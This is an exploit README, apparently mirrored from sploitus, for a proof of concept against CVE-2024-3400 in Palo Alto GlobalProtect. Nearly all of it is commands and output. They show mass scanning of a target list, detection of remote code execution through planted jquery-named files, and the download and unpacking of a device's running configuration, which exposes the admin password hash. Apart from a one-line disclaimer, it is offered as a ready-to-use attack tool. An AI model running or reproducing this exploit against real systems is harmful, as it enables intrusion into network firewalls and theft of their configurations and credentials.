Share
## https://sploitus.com/exploit?id=359BACBF-E36D-587B-AE63-346C1C7A539F
# CVE-2024-3400 PoC
for educational purposes only. only use on servers you have permission to test.
## How-To-Use
deps:
```bash
$ pip install rich
```
scan `targets.txt`๏ผ
```bash
$ python run.py -f targets.txt -t 10
[-] Sending 102 requests...
[+] Requests sent. Writing check file...
[-] Polling 36...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.ir2qgg4yi5.js...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.xaxdtscd5r.js...
...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.wtn5jvi7y1.js...
[+] Detected RCE: https://[hostname]/global-protect/portal/js/jquery.axfqashdsy.js
[-] Checking https://[hostname]/global-protect/portal/js/jquery.nibf1hcuf8.js...
[-] Sleeping...
```
note that this will retry for up to an hour. probably more than we need, but that's ok.
get configs:
```bash
$ python get_data.py
Getting https://[hostname]/global-protect/portal/js/jquery.h2lcipjuz7.js...
Getting https://[hostname]/global-protect/portal/js/jquery.68395vb2u8.js...
Getting https://[hostname]/global-protect/portal/js/jquery.ig3sug78m1.js...
...
Getting https://[hostname]/global-protect/portal/js/jquery.w6ty44a6yr.js...
$ mv jquery.w6ty44a6yr.js [hostname].tar.gz
$ tar -xf [hostname].tar.gz
$ cat opt/pancfg/mgmt/saved-configs/running-config.xml
<?xml version="1.0"?>
<config version="11.0.0" urldb="paloaltonetworks" detail-version="11.0.2">
<mgt-config>
<users>
<entry name="admin">
<phash>$5$jwgqcoyx$9...
...
```
### Reference
https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan
https://github.com/h4x0r-dz/CVE-2024-3400
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/